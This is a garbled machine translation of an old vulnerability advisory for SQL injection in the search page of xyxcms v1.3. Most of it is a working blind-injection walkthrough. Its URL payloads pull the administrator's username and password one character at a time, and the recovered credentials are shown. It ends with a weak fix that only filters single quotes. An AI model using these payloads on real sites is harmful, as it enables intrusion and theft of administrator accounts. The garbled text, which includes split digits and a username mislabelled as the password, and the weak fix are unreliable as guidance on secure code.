xyxcms v1. 3 search injection vulnerability-vulnerability warning-the black bar safety net

2010-06-22T00:00:00
ID MYHACK58:62201027320
Type myhack58
Reporter 佚名
Modified 2010-06-22T00:00:00

Description

Search Page Code filtering is not strict, resulting in the search string-type the injection s. asp from this code can be seen in the search string injection

k=request. QueryString("k") page=request. QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1 else g_cur_page=cint(page) end if

Vulnerability testing using the method:

<http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT CoUNt() FrOM admin)>=0 AnD '%2 5'=' guess the solution data repository for the admin <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT CoUNt() FrOM admin)=1 AnD '%2 5'=' judgment of the administrator 1 <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT CoUNt() FrOM admin Where len(username)=4)=1 AnD '%2 5'=' administrator account length of 4 bits <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT CoUNt() FrOM admin Where len(password)=8)=1 AnD '%2 5'=' administrator password length is 8 bits

username length is 4

<http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 0 9 & '%2 5'=' user the first bit is the q <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=9 7 & '%2 5'=' user second is i

<http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 1 4 & '%2 5'=' user third is n <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 1 5 & '%2 5'=' user fourth position is g

So the password is qing

password length is 8

<http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=4 9 & '%2 5'=' password of the first bit is 1 <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=5 0 AnD '%2 5'=' a password the second is 2 <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=5 1 AnD '%2 5'=' a password a third is 3 <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=5 2 & '%2 5'=' password fourth digit is 4 <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 1 3 & '%2 5'=' a password the fifth position is q <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 1 9 AnD '%2 5'=' The password of the sixth bit is w <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 1 3 & '%2 5'=' The password to the seventh bit is the q <http://www.hack58.com/s.asp?k=1%25'> AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=1 1 9 AnD '%2 5'=' a password the first eight bits are w

So the password is 1234qwqw

Vulnerability repair method to filter out the' on the line

k=request. QueryString("k") if instr(k,"'")>0 response. Write "<script>alert('error');window. close();</script>" response. End() end if page=request. QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1 else g_cur_page=cint(page) end if

Starters: mars